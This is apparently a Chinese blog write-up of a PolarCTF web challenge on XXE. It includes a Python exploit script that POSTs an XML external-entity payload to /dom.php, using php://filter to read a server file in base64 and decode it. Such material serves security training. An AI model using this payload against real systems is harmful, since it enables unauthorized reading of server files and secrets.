Polar Web【中等】xxe

_廿_尘2024-06-09 18:10

Polar Web【中等】xxe

Contents

思路&探索

如题目所示,此题考查XXE漏洞,具体细节需要逐步深挖

  1. 打开站点,提示了flag所在的文件,点击按钮,可见php的配置信息,搜索xml发现该服务可读取外部XML实体
  2. 由于并不清楚具体的注入路径,因此先对站点进行扫描,发现存在/dom.php路径
  3. 进入该路径发现下图中的报错信息,根据XXE漏洞的操作方式,采用POST方法将构造好的XML字符串传入/dom.php 站点,得到一串经由base64编码的字符串,解码后得到flag
  • 本文采用手动和脚本两种方式来实现解答


  • 在使用HackBar传入时,经测试使用下面的模式来传数据才能生效


EXP

python 复制代码 
import requests
import base64


def attack(url, pl):
    resp = requests.post(url, pl).text
    if resp:
    	# 为方便可读,对输出稍作处理
        out = resp[resp.index('textContent') + 16:resp.rindex(')')]
        out = base64.b64decode(out.encode()).decode()
        out = out[out.index('flag'):]
        print(out)
    else:
        print("Nothing...")


if __name__ == '__main__':
    u = 'http://~.www.polarctf.com:8090/dom.php'
    payload = '''<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE polar [
        <!ELEMENT name ANY >
        <!ENTITY polar SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
        ]>
<name>&polar;</name>
    '''
    attack(u, payload)

运行&总结

  • 本题考查XXE漏洞的基本原理以及渗透方式,需要对XML文档结构和XML实体的引入方式有所了解
  • 在构造的外部XML实体中,采用的是php://filter/read(伪协议读取模块)中的base64编码器实现对服务器文件flagggg.php的读取

敬,不完美的明天

相关推荐
米羊1214 小时前
fastjson (3修复)
网络·网络协议·安全
weixin_462446238 小时前
exo + tinygrad:Linux 节点设备能力自动探测(NVIDIA / AMD / CPU 安全兜底)
linux·运维·python·安全
Neolnfra9 小时前
攻防实战:数据窃取技术详解
web安全·网络安全·数据安全
淮上安子骞10 小时前
sage10.8源码部署
服务器·密码学·ctf·本地部署·sage
m0_4772031010 小时前
Hercules-HTB-writeUp
web安全·网络安全
给勒布朗上上对抗呀12 小时前
反序列化之字符串逃逸-0CTF2016-piapiapia
ctf
喂自己代言13 小时前
Windows 10 22H2 纯系统自带工具安全方案
windows·安全
福来阁86号技师13 小时前
2025年第二届Solar应急响应挑战赛
ctf·应急响应
合才科技15 小时前
【要闻周报】网络安全与数据合规 12-31
安全·web安全
Par@ish15 小时前
【网络安全】Apache StreamPipes 严重漏洞使攻击者可夺取管理员控制权
安全·web安全·apache
热门推荐
01GitHub 镜像站点02jdk21下载、安装(Windows、Linux、macOS)03Linux下V2Ray安装配置指南04手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!05Claude Code Skills 实用使用手册062025 最新教程:注册并切换到美区 Apple ID07UV安装并设置国内源08【踩坑笔记】50系显卡适配的 PyTorch 安装09KGG转MP3工具|非KGM文件|解密音频10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)